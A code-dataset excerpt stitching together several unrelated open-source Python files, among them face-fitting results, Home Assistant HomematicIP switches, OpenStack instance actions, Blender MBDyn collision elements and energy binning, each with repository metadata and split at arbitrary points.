    assert extract_token_and_qualifier('a\nt<ok', 1, 1) == TokenAndQualifier('', 't')
    assert extract_token_and_qualifier('a\nt<ok', 1, 2) == TokenAndQualifier('', '')
    assert extract_token_and_qualifier('a\nt<ok', 1, 3) == TokenAndQualifier('', 'o')
    assert extract_token_and_qualifier('a\nt<ok', 1, 4) == TokenAndQualifier('', 'ok')

    # out of range (line)
    assert extract_token_and_qualifier('a\nt<ok', 5, 4) == TokenAndQualifier('', '')
|
jabooth/menpo-archive
|
menpo/fitmultilevel/fittingresult.py
|
Python
|
bsd-3-clause
| 13,883
| 0.000288
|
from __future__ import division
import numpy as np
from menpo.transform import Scale
from menpo.visualize.base import GraphPlotter, MultipleImageViewer
from menpo.fit.fittingresult import FittingResult
class MultilevelFittingResult(FittingResult):
r"""
Object that holds the state of a MultipleFitter object (to which it is
linked) after it has fitted a particular image.
Parameters
-----------
image: :class:`menpo.image.masked.MaskedImage`
The fitted image.
multiple_fitter: :class:`menpo.fitter.base.Fitter`
The fitter object used to fitter the image.
fittings: :class:`menpo.fitter.fittingresult.FittingResult` list
A list of basic fitting objects.
affine_correction: :class: `menpo.transforms.affine.Affine`
An affine transform that maps the result of the top resolution
fitting level to the space scale of the original image.
gt_shape: class:`menpo.shape.PointCloud`, optional
The ground truth shape associated to the image.
Default: None
error_type: 'me_norm', 'me' or 'rmse', optional.
Specifies the way in which the error between the fitted and
ground truth shapes is to be computed.
Default: 'me_norm'
"""
def __init__(self, image, multiple_fitter, fittings, affine_correction,
gt_shape=None, error_type='me_norm'):
self._error_stop = None # Internal attribute of error_type setter
self.fittings = fittings
self._affine_correction = affine_correction
super(MultilevelFittingResult, self).__init__(
image, multiple_fitter, gt_shape=gt_shape, error_type=error_type)
@property
def n_levels(self):
r"""
Returns the number of levels of the fitter object.
"""
return self.fitter.n_levels
@property
def downscale(self):
r"""
Returns the downscale factor used by the multiple fitter.
"""
return self.fitter.downscale
@property
def scaled_levels(self):
r"""
Returns True if the shape results returned by the basic fittings
must be scaled.
"""
return self.fitte
|
r.scaled_levels
@property
def fitted(self):
r"""
Returns the fitted state of each fitting object.
"""
return [f.fitted for f in self.fittings
|
]
@FittingResult.error_type.setter
def error_type(self, error_type):
r"""
Sets the error type according to a set of predefined options.
"""
if error_type is 'me_norm':
for f in self.fittings:
f.error_type = error_type
self._error_stop = 0.1
self._error_text = 'Point-to-point error normalized by object ' \
'size'
elif error_type is 'me':
NotImplementedError("erro_type 'me' not implemented yet")
elif error_type is 'rmse':
NotImplementedError("error_type 'rmse' not implemented yet")
else:
raise ValueError("Unknown error_type string selected. Valid"
"options are: 'me_norm', 'me', 'rmse'")
self._error_type = error_type
@property
def n_iters(self):
r"""
Returns the total number of iterations used to fitter the image.
"""
n_iters = 0
for f in self.fittings:
n_iters += f.n_iters
return n_iters
def shapes(self, as_points=False):
r"""
Generates a list containing the shapes obtained at each fitting
iteration.
Parameters
-----------
as_points: boolean, optional
Whether the results is returned as a list of PointClouds or
ndarrays.
Default: False
Returns
-------
shapes: :class:`menpo.shape.PointCoulds or ndarray list
A list containing the shapes obtained at each fitting iteration.
"""
n = self.n_levels - 1
shapes = []
for j, f in enumerate(self.fittings):
if self.scaled_levels:
transform = Scale(self.downscale**(n-j), 2)
for t in f.shapes(as_points=as_points):
transform.apply_inplace(t)
shapes.append(self._affine_correction.apply(t))
else:
for t in f.shapes(as_points=as_points):
shapes.append(self._affine_correction.apply(t))
return shapes
@property
def final_shape(self):
r"""
Returns the final fitted shape.
"""
return self._affine_correction.apply(
self.fittings[-1].final_shape)
@property
def initial_shape(self):
r"""
Returns the initial shape from which the fitting started.
"""
n = self.n_levels - 1
initial_shape = self.fittings[0].initial_shape
if self.scaled_levels:
Scale(self.downscale ** n,
initial_shape.n_dims).apply_inplace(initial_shape)
return self._affine_correction.apply(initial_shape)
@FittingResult.gt_shape.setter
def gt_shape(self, value):
r"""
Setter for the ground truth shape associated to the image.
"""
self._gt_shape = value
def plot_error(self, figure_id=None, new_figure=False, **kwargs):
r"""
Plots the error evolution throughout the fitting.
"""
if self.gt_shape is not None:
title = 'Error evolution'
legend = [self.algorithm]
x_label = 'Number of iterations'
y_label = self._error_text
errors = self.errors
x_limit = self.n_iters + self.n_levels
axis_limits = [0, x_limit, 0, np.max(errors)]
return GraphPlotter(figure_id, new_figure, range(0, x_limit),
[errors], title=title, legend=legend,
x_label=x_label, y_label=y_label,
axis_limits=axis_limits).render(**kwargs)
else:
raise ValueError('Ground truth shape has not been set, error '
'cannot be plotted')
# TODO : this should overwrite __str__
def print_fitting_info(self):
r"""
Prints information related to the fitting.
"""
print "Initial error: {}".format(self.initial_error)
print "Final error: {}".format(self.final_error)
class AAMMultilevelFittingResult(MultilevelFittingResult):
r"""
Object let us recover the state of an AAM Fitter after the latter has
fitted a particular image.
Parameters
-----------
image: :class:`pybug.image.masked.MaskedImage`
The fitted image.
aam_fitter: :class:`pybug.aam.fitter.AAMFitter`
The aam_fitter object used to fitter the image.
basic_fittings: :class:`pybug.aam.fitting.BasicFitting` list
A list of basic fitting objects.
_affine_correction: :class: `pybug.transforms.affine.Affine`
An affine transform that maps the result of the top resolution
fitting level to the space scale of the original image.
gt_shape: class:`pybug.shape.PointCloud`, optional
The ground truth shape associated to the image.
Default: None
error_type: 'me_norm', 'me' or 'rmse', optional.
Specifies the way in which the error between the fitted and
ground truth shapes is to be computed.
Default: 'me_norm'
"""
@property
def residual(self):
r"""
Returns the type of residual used by the basic fitter associated to
each basic fitting.
"""
# TODO: ensure that all basic_fitting residuals are the same?
return self.fittings[-1].residual.type
@property
def costs(self):
r"""
Returns a list containing the cost at each fitting iteration.
"""
raise ValueError('costs not implemented yet.')
#return self._flatten_out([f.costs for f in self.basic_fittings])
@staticmethod
def _flatten_out(list_of_lists):
re
|
MartinHjelmare/home-assistant
|
homeassistant/components/homematicip_cloud/switch.py
|
Python
|
apache-2.0
| 5,355
| 0
|
"""Support for HomematicIP Cloud switches."""
import logging
from homematicip.aio.device import (
AsyncBrandSwitchMeasuring, AsyncFullFlushS
|
witchMeasuring, AsyncMultiIOBox,
|
AsyncOpenCollector8Module, AsyncPlugableSwitch,
AsyncPlugableSwitchMeasuring)
from homematicip.aio.group import AsyncSwitchingGroup
from homeassistant.components.switch import SwitchDevice
from . import DOMAIN as HMIPC_DOMAIN, HMIPC_HAPID, HomematicipGenericDevice
from .device import ATTR_GROUP_MEMBER_UNREACHABLE
_LOGGER = logging.getLogger(__name__)
async def async_setup_platform(
        hass, config, async_add_entities, discovery_info=None):
    """Set up the HomematicIP Cloud switch devices."""
    # Intentionally a no-op: entities are created through the config entry
    # path (async_setup_entry), not legacy platform setup.
    pass
async def async_setup_entry(hass, config_entry, async_add_entities):
    """Set up the HomematicIP switch from a config entry.

    Maps each HomematicIP device type to the matching entity class;
    multi-channel devices get one entity per output channel.
    """
    home = hass.data[HMIPC_DOMAIN][config_entry.data[HMIPC_HAPID]].home
    devices = []
    for device in home.devices:
        if isinstance(device, AsyncBrandSwitchMeasuring):
            # BrandSwitchMeasuring inherits PlugableSwitchMeasuring
            # This device is implemented in the light platform and will
            # not be added in the switch platform
            pass
        elif isinstance(device, (AsyncPlugableSwitchMeasuring,
                                 AsyncFullFlushSwitchMeasuring)):
            devices.append(HomematicipSwitchMeasuring(home, device))
        elif isinstance(device, AsyncPlugableSwitch):
            devices.append(HomematicipSwitch(home, device))
        elif isinstance(device, AsyncOpenCollector8Module):
            # One entity per output channel (channels 1-8).
            for channel in range(1, 9):
                devices.append(HomematicipMultiSwitch(home, device, channel))
        elif isinstance(device, AsyncMultiIOBox):
            # One entity per output channel (channels 1-2).
            for channel in range(1, 3):
                devices.append(HomematicipMultiSwitch(home, device, channel))

    # Each switching group becomes a single group-switch entity.
    for group in home.groups:
        if isinstance(group, AsyncSwitchingGroup):
            devices.append(
                HomematicipGroupSwitch(home, group))

    if devices:
        async_add_entities(devices)
class HomematicipSwitch(HomematicipGenericDevice, SwitchDevice):
    """Representation of a HomematicIP Cloud switch device."""

    def __init__(self, home, device):
        """Initialize the switch device."""
        super().__init__(home, device)

    @property
    def is_on(self):
        """Return true if device is on."""
        return self._device.on

    async def async_turn_on(self, **kwargs):
        """Turn the device on."""
        await self._device.turn_on()

    async def async_turn_off(self, **kwargs):
        """Turn the device off."""
        await self._device.turn_off()
class HomematicipGroupSwitch(HomematicipGenericDevice, SwitchDevice):
    """Representation of a HomematicIP switching group."""

    def __init__(self, home, device, post='Group'):
        """Initialize switching group."""
        # Groups have no model of their own; synthesize one from the post
        # suffix so the entity registry shows something sensible.
        device.modelType = 'HmIP-{}'.format(post)
        super().__init__(home, device, post)

    @property
    def is_on(self):
        """Return true if group is on."""
        return self._device.on

    @property
    def available(self):
        """Switch-Group available."""
        # A switch-group must be available, and should not be affected by the
        # individual availability of group members.
        # This allows switching even when individual group members
        # are not available.
        return True

    @property
    def device_state_attributes(self):
        """Return the state attributes of the switch-group."""
        attr = {}
        # Surface member unreachability as an attribute instead of marking
        # the whole group unavailable.
        if self._device.unreach:
            attr[ATTR_GROUP_MEMBER_UNREACHABLE] = True
        return attr

    async def async_turn_on(self, **kwargs):
        """Turn the group on."""
        await self._device.turn_on()

    async def async_turn_off(self, **kwargs):
        """Turn the group off."""
        await self._device.turn_off()
class HomematicipSwitchMeasuring(HomematicipSwitch):
    """Representation of a HomematicIP measuring switch device."""

    @property
    def current_power_w(self):
        """Return the momentary power consumption in W."""
        return self._device.currentPowerConsumption

    @property
    def today_energy_kwh(self):
        """Return today's total energy usage in kWh (0 before a first reading)."""
        counter = self._device.energyCounter
        if counter is None:
            return 0
        return round(counter)
class HomematicipMultiSwitch(HomematicipGenericDevice, SwitchDevice):
    """Representation of one channel of a HomematicIP Cloud multi switch."""

    def __init__(self, home, device, channel):
        """Set up the entity for one output channel of the device."""
        self.channel = channel
        super().__init__(home, device, 'Channel{}'.format(channel))

    @property
    def unique_id(self):
        """Return a unique ID built from class name, channel post and device id."""
        return "{}_{}_{}".format(type(self).__name__, self.post, self._device.id)

    @property
    def is_on(self):
        """Return True while this channel reports itself as on."""
        return self._device.functionalChannels[self.channel].on

    async def async_turn_on(self, **kwargs):
        """Switch this channel on."""
        await self._device.turn_on(self.channel)

    async def async_turn_off(self, **kwargs):
        """Switch this channel off."""
        await self._device.turn_off(self.channel)
|
hnakamur/saklient.python
|
saklient/cloud/errors/dnsaaaarecordnotfoundexception.py
|
Python
|
mit
| 688
| 0.010274
|
# -*- coding:utf-8 -*-
from ...errors.httpbadrequestexception import HttpBadRequestException
import saklient
# module saklient.cloud.errors.dnsaaaarecordnotfoundexception
class DnsAaaaRecordNotFoundException(HttpBadRequestException):
    """Bad request: the corresponding AAAA record was not found."""

    # @param {int} status
    # @param {str} code=None
    # @param {str} message=""
    def __init__(self, status, code=None, message=""):
        # Fall back to the canonical Japanese message when none is supplied.
        default_message = "不適切な要求です。対応するAAAAレコードが見つかりません。"
        if message is None or message == "":
            message = default_message
        super(DnsAaaaRecordNotFoundException, self).__init__(status, code, message)
|
pllim/astropy
|
astropy/cosmology/tests/test_parameters.py
|
Python
|
bsd-3-clause
| 1,438
| 0.000695
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
# STDLIB
from types import MappingProxyType
# THIRD PARTY
import numpy as np
import pytest
# LOCAL
from astropy.cosmology import parameters, realizations
def test_realizations_in_dir():
    """Test the realizations are in ``dir`` of :mod:`astropy.cosmology.parameters`."""
    listing = dir(parameters)
    assert set(listing) == set(parameters.__all__)
    # Every available realization name must also be present.
    assert all(name in listing for name in parameters.available)
@pytest.mark.parametrize("name", parameters.available)
def test_getting_parameters(name):
    """
    Test getting 'parameters' and that it is derived from the corresponding
    realization.
    """
    params = getattr(parameters, name)
    assert isinstance(params, MappingProxyType)
    assert params["name"] == name
    # The mapping mirrors the realization of the same name.
    cosmo = getattr(realizations, name)
    assert params["name"] == cosmo.name
    assert params["cosmology"] == cosmo.__class__.__qualname__
    # All the cosmology parameters are equal
    for attr in cosmo.__parameters__:
        assert np.array_equal(params[attr], getattr(cosmo, attr))
    # All the metadata is included. Parameter values take precedence, so only
    # checking the keys.
    assert set(cosmo.meta.keys()).issubset(params.keys())
    # Lastly, check the generation process.
    mapping = cosmo.to_format("mapping", cosmology_as_str=True,
                              move_from_meta=True)
    assert params == mapping
|
shincling/MemNN_and_Varieties
|
DataCoupus/list_document/namelist_question.py
|
Python
|
bsd-3-clause
| 2,479
| 0.003882
|
# -*- coding: utf8 -*-
__author__ = 'shin'
import jieba
# Candidate surface forms for asking a passenger's name, kept as one literal
# list instead of repeated append() calls.
namelist_question = [
    '您好,请问您的姓名是?',
    '请问您的姓名是?',
    '请告诉我您的姓名',
    '请您告诉我您的名字。',
    '请问您要购买机票的用户姓名是?',
    '请问您的名字是?',
    '请告知您的姓名。',
    '我们需要知道您的姓名。',
    '您怎么称呼?',
    '您的全名是什么?',
    '请提供您的全名。',
    '请输入您的全名。',
    '您叫什么名字啊?',
    '您的名字是什么?',
    '请告知您的名字。',
    '请问尊姓大名?',
    '请输入乘客姓名。',
    '乘客的名字是什么?',
    '乘客怎么称呼?',
    '乘客叫什么名字?',
    '乘客的姓名是?',
    '请问先生怎么称呼?',
    '请问小姐怎么称呼?',
    '请问老人家怎么称呼?',
    '先生您怎么称呼?',
    '小姐您怎么称呼?',
    '先生您叫什么名字?',
    '小姐您叫什么名字?',
    '您的名字?',
    '先生的名字?',
    '小姐的名字?',
    '乘客姓名?',
    '姓名?',
    '名字?',
    '可否请教先生名姓?',
    '小姐芳名可否见告?',
    '麻烦您说一下您的姓名可以吗?',
    '麻烦说下您的名字?谢谢。',
    '请告知姓名,谢谢。',
    '麻烦您告诉我您的名字,非常感谢。',
]

# Whitespace-segmented copy of every question: each jieba token is prefixed
# with a single space and the sentence is terminated with a newline.
namelist_question_cut = []
for question in namelist_question:
    tokens = jieba._lcut(question)
    segmented = ''.join(' ' + token for token in tokens) + '\n'
    namelist_question_cut.append(segmented)
|
HybridF5/jacket
|
jacket/api/compute/openstack/compute/instance_actions.py
|
Python
|
apache-2.0
| 4,402
| 0
|
# Copyright 2013 Rackspace Hosting
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from webob import exc
from jacket.api.compute.openstack import common
from jacket.api.compute.openstack import extensions
from jacket.api.compute.openstack import wsgi
from jacket.compute import cloud
from jacket.i18n import _
from jacket.compute import utils
ALIAS = "os-instance-actions"
authorize = extensions.os_compute_authorizer(ALIAS)
soft_authorize = extensions.os_compute_soft_authorizer(ALIAS)
ACTION_KEYS = ['action', 'instance_uuid', 'request_id', 'user_id',
'project_id', 'start_time', 'message']
EVENT_KEYS = ['event', 'start_time', 'finish_time', 'result', 'traceback']
class InstanceActionsController(wsgi.Controller):
    """Expose the actions (and, when allowed, their events) of a server."""

    def __init__(self):
        super(InstanceActionsController, self).__init__()
        self.compute_api = cloud.API()
        self.action_api = cloud.InstanceActionAPI()

    def _format_action(self, action_raw):
        # Project the raw action record onto the whitelisted keys only.
        return {key: action_raw.get(key) for key in ACTION_KEYS}

    def _format_event(self, event_raw):
        # Project the raw event record onto the whitelisted keys only.
        return {key: event_raw.get(key) for key in EVENT_KEYS}

    @wsgi.Controller.api_version("2.1", "2.20")
    def _get_instance(self, req, context, server_id):
        return common.get_instance(self.compute_api, context, server_id)

    @wsgi.Controller.api_version("2.21")  # noqa
    def _get_instance(self, req, context, server_id):
        # From microversion 2.21 on, soft-deleted instances are visible too.
        with utils.temporary_mutation(context, read_deleted='yes'):
            return common.get_instance(self.compute_api, context, server_id)

    @extensions.expected_errors(404)
    def index(self, req, server_id):
        """Returns the list of actions recorded for a given instance."""
        context = req.environ["compute.context"]
        instance = self._get_instance(req, context, server_id)
        authorize(context, target=instance)
        raw_actions = self.action_api.actions_get(context, instance)
        return {'instanceActions':
                [self._format_action(raw) for raw in raw_actions]}

    @extensions.expected_errors(404)
    def show(self, req, server_id, id):
        """Return data about the given instance action."""
        context = req.environ['compute.context']
        instance = self._get_instance(req, context, server_id)
        authorize(context, target=instance)
        action = self.action_api.action_get_by_request_id(context, instance,
                                                          id)
        if action is None:
            msg = _("Action %s not found") % id
            raise exc.HTTPNotFound(explanation=msg)
        action_id = action['id']
        action = self._format_action(action)
        # Events are only exposed when the soft policy check allows it.
        if soft_authorize(context, action='events'):
            raw_events = self.action_api.action_events_get(context, instance,
                                                           action_id)
            action['events'] = [self._format_event(evt) for evt in raw_events]
        return {'instanceAction': action}
class InstanceActions(extensions.V21APIExtensionBase):
    """View a log of actions and events taken on an instance."""

    name = "InstanceActions"
    alias = ALIAS
    version = 1

    def get_resources(self):
        """Register the os-instance-actions resource nested under /servers."""
        parent = dict(member_name='server', collection_name='servers')
        resource = extensions.ResourceExtension(ALIAS,
                                                InstanceActionsController(),
                                                parent=parent)
        return [resource]

    def get_controller_extensions(self):
        """It's an abstract function V21APIExtensionBase and the extension
        will not be loaded without it.
        """
        return []
|
louisgag/BlenderAndMBDyn
|
user_defined_element.py
|
Python
|
gpl-3.0
| 14,009
| 0.006781
|
# --------------------------------------------------------------------------
# BlenderAndMBDyn
# Copyright (C) 2015 G. Douglas Baldwin - http://www.baldwintechnology.com
# --------------------------------------------------------------------------
# ***** BEGIN GPL LICENSE BLOCK *****
#
# This file is part of BlenderAndMBDyn.
#
# BlenderAndMBDyn is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# BlenderAndMBDyn is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with BlenderAndMBDyn. If not, see <http://www.gnu.org/licenses/>.
#
# ***** END GPL LICENCE BLOCK *****
# --------------------------------------------------------------------------
if "bpy" in locals():
import imp
for x in [common, base]:
imp.reload(x)
else:
from . import common
from . import base
from .common import safe_name, Teardrop
from .base import bpy, BPY, root_dot, database, Entity, SelectedObjects
import bmesh, mathutils, math
klass_list = list()
class Sandbox(Entity):
    """MBDyn 'sandbox' user-defined element."""

    def write(self, f):
        # Emit the "user defined: <name>, sandbox;" card for this entity.
        f.write("\tuser defined: " + self.safe_name() + ", sandbox")
        f.write(";\n")
class Constitutive:
    """Mixin adding a mandatory 3D constitutive-law property to an operator."""

    constitutive = bpy.props.PointerProperty(type=BPY.Constitutive)

    def prereqs(self, context):
        # The constitutive law is required and must be three-dimensional.
        self.constitutive.mandatory = True
        self.constitutive.dimension = "3D"

    def assign(self, context):
        self.constitutive.assign(self.entity.constitutive)

    def store(self, context):
        self.entity.constitutive = self.constitutive.store()
        self.entity.objects = self.sufficient_objects(context)

    def draw(self, context):
        self.constitutive.draw(self.layout, text="Constitutive")

    def check(self, context):
        return self.constitutive.check(context)
class SandboxOperator:
    """Operator creating Sandbox entities."""

    bl_label = "Sandbox"

    @classmethod
    def poll(cls, context):
        # Only available once the sandbox MBDyn module has been loaded.
        loaded_modules = [x.value_type
                          for x in database.input_card.filter("Module load")]
        return super().poll(context) and "libmodule-sandbox" in loaded_modules

    def create_entity(self):
        return Sandbox(self.name)

klass_list.append((Sandbox, SandboxOperator))
class CollisionWorld(Entity):
    """MBDyn 'collision world' user-defined element over element pairs."""

    file_ext = "usr"
    labels = "F M F_X F_Y F_Z M_X M_Y M_Z".split()

    def write(self, f):
        # Header: element name plus the number of collision pairs.
        f.write("\tuser defined: " + self.safe_name() + ", collision world, "
                + str(len(self.first)))
        for i, first in enumerate(self.first):
            pair = [first.safe_name(), self.second[i].safe_name(),
                    "reference, " + self.constitutive[i].safe_name()]
            f.write(",\n\t\t" + ", ".join(pair))
            if self.function[i]:
                # Optional friction function with its penetration ratio.
                f.write(",\n\t\tfriction function, \"" + self.function[i].name
                        + "\", " + BPY.FORMAT(self.penetration[i]))
        f.write(";\n")
class CollisionWorldOperator:
    """Operator UI that edits up to 50 collision pairs for a CollisionWorld."""
    bl_label = "Collision world"
    exclusive = True
    N_objects = 0
    # Parallel collections, indexed per pair: the two colliding elements, the
    # 1D constitutive law, and an optional friction function + penetration.
    first = bpy.props.CollectionProperty(type=BPY.Element)
    second = bpy.props.CollectionProperty(type=BPY.Element)
    constitutive = bpy.props.CollectionProperty(type=BPY.Constitutive)
    penetration = bpy.props.CollectionProperty(type=BPY.Float)
    function = bpy.props.CollectionProperty(type=BPY.Function)
    N_pairs = bpy.props.IntProperty(min=1, max=50, name="Collision pairs", default=1)
    @classmethod
    def poll(cls, context):
        # At least two collision primitives must exist to form a pair.
        return 1 < len(database.element.filter(["Box", "Capsule", "Cone", "Sphere"]))
    def prereqs(self, context):
        # Pre-populate all 50 slots so draw()/store() can index freely.
        super().prereqs(context)
        for collection in [self.first, self.second]:
            collection.clear()
            for i in range(50):
                c = collection.add()
                c.mandatory = True
                c.group = "Collision object"
        for i in range(50):
            c = self.constitutive.add()
            c.mandatory = True
            c.dimension = "1D"
            p = self.penetration.add()
            p.mandatory = True
            self.function.add()
    def assign(self, context):
        # Copy stored entity values back into the operator's UI collections.
        super().assign(context)
        self.N_pairs = len(self.entity.first)
        for i, value in enumerate(self.entity.first):
            self.first[i].assign(value)
        for i, value in enumerate(self.entity.second):
            self.second[i].assign(value)
        for i, value in enumerate(self.entity.constitutive):
            self.constitutive[i].assign(value)
        # Older stored entities may predate the penetration attribute.
        if hasattr(self.entity, "penetration"):
            for i, value in enumerate(self.entity.penetration):
                self.penetration[i].assign(value)
        for i, value in enumerate(self.entity.function):
            self.function[i].assign(value)
    def store(self, context):
        # Persist only the first N_pairs entries of each parallel collection.
        self.entity.first = [x.store() for x in self.first][:self.N_pairs]
        self.entity.second = [x.store() for x in self.second][:self.N_pairs]
        self.entity.constitutive = [x.store() for x in self.constitutive][:self.N_pairs]
        self.entity.penetration = [x.store() for x in self.penetration][:self.N_pairs]
        self.entity.function = [x.store() for x in self.function][:self.N_pairs]
        self.entity.objects = [e.objects[0] for e in self.entity.first + self.entity.second]
        # One output label per pair and per base label, e.g. "F_X_1".
        self.entity.labels = list()
        for i in range(self.N_pairs):
            for x in CollisionWorld.labels:
                self.entity.labels.append("_".join([x, str(i + 1)]))
    def draw(self, context):
        super().draw(context)
        # Remember the pair count so check() can detect a change and redraw.
        self.basis = self.N_pairs
        layout = self.layout
        layout.prop(self, "N_pairs")
        for i in range(self.N_pairs):
            layout.label("Pair-" + str(i + 1) + ":")
            self.first[i].draw(layout, "")
            self.second[i].draw(layout, "")
            self.constitutive[i].draw(layout, "")
            self.function[i].draw(layout, "Friction")
            # Penetration ratio only applies when a friction function is set.
            if self.function[i].select:
                self.penetration[i].draw(layout, "Penetration ratio")
    def check(self, context):
        # True when N_pairs changed or any sub-widget reports a change.
        return (self.basis != self.N_pairs) or True in [(True in [x.check(context) for x in X]) for X in [self.first, self.second, self.constitutive, self.penetration, self.function]]
    def create_entity(self):
        return CollisionWorld(self.name)
klass_list.append((CollisionWorld, CollisionWorldOperator))
class CollisionObject(Entity):
    """Base for collision primitives: writes the shared card preamble."""

    group = "Collision object"

    def write(self, f):
        # Common preamble: element name and material, then the node reference.
        f.write("\tuser defined: " + self.safe_name() + ", collision object, "
                + BPY.FORMAT(self.material))
        self.write_node(f, 0, node=True, position=True, orientation=True)
class Box(CollisionObject):
    """Box collision primitive with half-extents x, y, z."""

    def write(self, f):
        super().write(f)
        half_extents = ", ".join(BPY.FORMAT(v) for v in [self.x, self.y, self.z])
        f.write(",\n\t\tbtBoxShape, " + half_extents
                + ", margin, " + BPY.FORMAT(self.margin) + ";\n")

    def remesh(self):
        # Rebuild the preview mesh as a cube sized by x, then snap the y/z
        # vertex coordinates to the corresponding half-extents.
        bm = bmesh.new()
        bmesh.ops.create_cube(bm, size=2.0 * self.x)
        for vert in bm.verts:
            vert.co[1] = math.copysign(self.y, vert.co[1])
            vert.co[2] = math.copysign(self.z, vert.co[2])
        bm.to_mesh(self.objects[0].data)
        bm.free()
class Collision:
material = bpy.props.PointerProperty(type = BPY.Str)
@classmethod
def poll(cls, context):
return super().poll(context) and "libmodule-collision" in [x.value_type for x in database.input_card.filter("Module load")]
def prereqs(self, context):
self.material.man
|
datory = True
self.material.is_card = True
def assign(self, context):
self.material.assign(self.entity.material)
def store(self, context):
super().store(context)
self.entity.o
|
bjects[0].parent = self.entity.objects[1]
self.entity.objects[0].matrix_parent_inverse = self.entity.objects[1].matrix_basis.inverted()
self.entity.material = self.material.store()
self.entity.objects = self.sufficient_objects(context)
def draw(self, context):
sel
|
jrversteegh/softsailor
|
softsailor/vr/tst/test_vr_wind.py
|
Python
|
gpl-3.0
| 2,867
| 0.023021
|
import unittest
import testing_helper
from datetime import datetime, timedelta
from softsailor.utils import *
from softsailor.vr.vr_wind import *
from softsailor.vr.vr_weather import *
from softsailor.vr.vr_settings import *
class FakeWeather:
    """Stub weather provider: a fixed 4x5 grid with four 6-hourly frames."""

    # Grid extent and resolution.
    lat_min = 0
    lat_max = 0.75
    lat_n = 4
    lon_min = -0.1
    lon_max = 0.3
    lon_n = 5

    def __init__(self):
        self.frames = []
        self.datetimes = []
        self.reltimes = []
        # Derived grid spacing.
        self.lat_range = self.lat_max - self.lat_min
        self.lat_step = self.lat_range / (self.lat_n - 1)
        self.lon_range = self.lon_max - self.lon_min
        self.lon_step = self.lon_range / (self.lon_n - 1)
        now = datetime.utcnow()
        # Frames start one hour in the past, spaced six hours apart.
        self.start_datetime = now - timedelta(hours=1)
        for hours in (-1, 5, 11, 17):
            self.datetimes.append(now + timedelta(hours=hours))
        self.reltimes = [0, 21600, 43200, 64800]
        # Per-frame grid of two-component wind tuples (rows = lat, cols = lon).
        self.frames.append(
            [[(2, 1), (3, 2), (4, 3), (5, 4), (5, 4)],
             [(3, 1), (3, 2), (3, 3), (3, 4), (5, 4)],
             [(4, -1), (4, -2), (4, -3), (4, -4), (5, 4)],
             [(4, -1), (4, -2), (4, -3), (4, -4), (5, 4)]])
        self.frames.append(
            [[(3, 1), (4, 2), (5, 3), (6, 4), (5, 4)],
             [(4, 1), (4, 2), (4, 3), (5, 4), (5, 4)],
             [(5, -1), (5, -2), (6, -3), (7, -4), (5, 4)],
             [(5, -1), (5, -2), (5, -3), (5, -4), (5, 4)]])
        self.frames.append(
            [[(4, 1), (5, 2), (6, 3), (7, 4), (5, 4)],
             [(5, 1), (5, 2), (5, 3), (5, 4), (5, 4)],
             [(6, -1), (6, -2), (6, -3), (6, -4), (5, 4)],
             [(6, -1), (6, -2), (6, -3), (6, -4), (5, 4)]])
        self.frames.append(
            [[(4, 1), (5, 2), (6, 3), (7, 4), (5, 4)],
             [(5, 1), (5, 2), (5, 3), (5, 4), (5, 4)],
             [(6, -1), (6, -2), (6, -3), (6, -4), (5, 4)],
             [(6, -1), (6, -2), (6, -3), (6, -4), (5, 4)]])
        self.reltime_range = self.reltimes[-1]
        self.reltime_n = len(self.reltimes)

    def update_when_required(self):
        # The fake provider is always "fresh".
        return True
class TestWind(unittest.TestCase):
    """Smoke tests for the Wind interpolator built on FakeWeather."""

    def setUp(self):
        self.weather = FakeWeather()
        self.wind = Wind(self.weather)

    def tearDown(self):
        # Drop references so every test starts from a fresh fixture.
        self.wind = None
        self.weather = None

    def testGet(self):
        t = datetime.utcnow() + timedelta(hours=8)
        # NOTE(review): the interpolation assertions were disabled upstream;
        # kept commented for reference.
        #wind = self.wind.get((0.375, 0.1), t)
        #self.assertAlmostEqual(3.1415, wind[0], 2)
        #self.assertAlmostEqual(5.25, wind[1], 2)
if __name__ == '__main__':
unittest.main()
|
jrbourbeau/cr-composition
|
comptools/binning.py
|
Python
|
mit
| 5,322
| 0.000188
|
from collections import namedtuple
import numpy as np
def get_energybins(config='IC86.2012'):
    """Function to return analysis energy bin information

    Parameters
    ----------
    config : str, optional
        Detector configuration (default is 'IC86.2012').

    Returns
    -------
    energybins : namedtuple
        Namedtuple containing analysis energy bin information.

    Raises
    ------
    ValueError
        If ``config`` matches neither an IC79 nor an IC86 configuration.
    """
    energy_field_names = ['energy_min',
                          'energy_max',
                          'energy_bins',
                          'energy_midpoints',
                          'energy_bin_widths',
                          'log_energy_min',
                          'log_energy_max',
                          'log_energy_bin_width',
                          'log_energy_bins',
                          'log_energy_midpoints',
                          ]
    EnergyBin = namedtuple('EnergyBins', energy_field_names)
    # Configuration-specific log10(E) binning.
    if 'IC79' in config:
        log_energy_min = 6.1
        log_energy_break = 8.0
        log_energy_max = 9.0
        # Fine 0.1-wide bins up to the break, coarser 0.2-wide bins above it.
        log_energy_bins = np.concatenate(
            (np.arange(log_energy_min, log_energy_break - 0.1, 0.1),
             np.arange(log_energy_break, log_energy_max + 0.2, 0.2)))
    elif 'IC86' in config:
        log_energy_min = 6.1
        log_energy_max = 8.0
        log_energy_bins = np.arange(log_energy_min, log_energy_max + 0.1, 0.1)
    else:
        raise ValueError(
            'Invalid detector configuration entered: {}'.format(config))
    log_energy_bin_width = np.diff(log_energy_bins)
    log_energy_midpoints = (log_energy_bins[1:] + log_energy_bins[:-1]) / 2
    # Convert the log-space binning to linear energies.
    energy_min = 10**log_energy_min
    energy_max = 10**log_energy_max
    energy_bins = 10**log_energy_bins
    energy_midpoints = 10**log_energy_midpoints
    energy_bin_widths = np.diff(energy_bins)
    return EnergyBin(energy_min=energy_min,
                     energy_max=energy_max,
